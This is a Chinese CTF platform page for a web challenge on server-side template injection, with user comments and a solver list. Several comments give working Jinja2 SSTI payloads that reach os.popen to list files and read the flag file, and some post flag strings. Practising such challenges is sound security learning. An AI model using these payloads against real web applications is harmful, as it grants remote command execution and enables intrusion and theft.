Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15815
提  示:
描  述:
Simple_SSTI_2
评论
z0shell 7月前

/?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}

回复 0
Masterk 6月前

这是怎么想出来的。。

回复 2

ABUDUWILI 7月前

flag{ffb1bde14170624274f424caf4406a1a}

回复 0

L.. 7月前

SSTI模版注入:?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}},拓展?flag={{config.__class__.__init__.__globals__['os'].popen('cat../app/flag').read()}}

回复 0

qiqiguren 8月前

题解详细步骤:http://t.csdnimg.cn/yZlnn

回复 10
18476760376 7月前

好用,谢谢

回复 0

是呆瓜蔚呀 8月前

flag{f231bce175908e8fec554031a6232a55}

回复 0

htttpss 8月前

flag{c75b03620c73371a0e8f249354e0bd57} ?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}即可

回复 1

3166235571 8月前

是这个flag{561f38d2a44d42ca8847575a2e144b2b} so easy

回复 0

2280443298 8月前

{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}

回复 1

zhenbuhuiweb 9月前

flag{d15e0ca95ddb50b992109b24c82cfe5a}

回复 0

ssln 11月前

114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

YameMres 攻破了该题 12小时前
yixcjy 攻破了该题 2天前
DURUI 攻破了该题 3天前
零号酒仓 攻破了该题 3天前
besty2k 攻破了该题 4天前
zttyzz 攻破了该题 4天前
12334 攻破了该题 4天前
PY222 攻破了该题 4天前
魔刀千刃 攻破了该题 4天前
我是CTF大王 攻破了该题 4天前
16671766779 攻破了该题 5天前
海宝宝哈哈 攻破了该题 5天前
遇见遇见 攻破了该题 5天前
th0528 攻破了该题 5天前
/ 攻破了该题 5天前
15195388189 攻破了该题 6天前
18185185996 攻破了该题 11天前
KKsama 攻破了该题 11天前
zhuguangsen 攻破了该题 11天前
5013230204 攻破了该题 13天前
问题反馈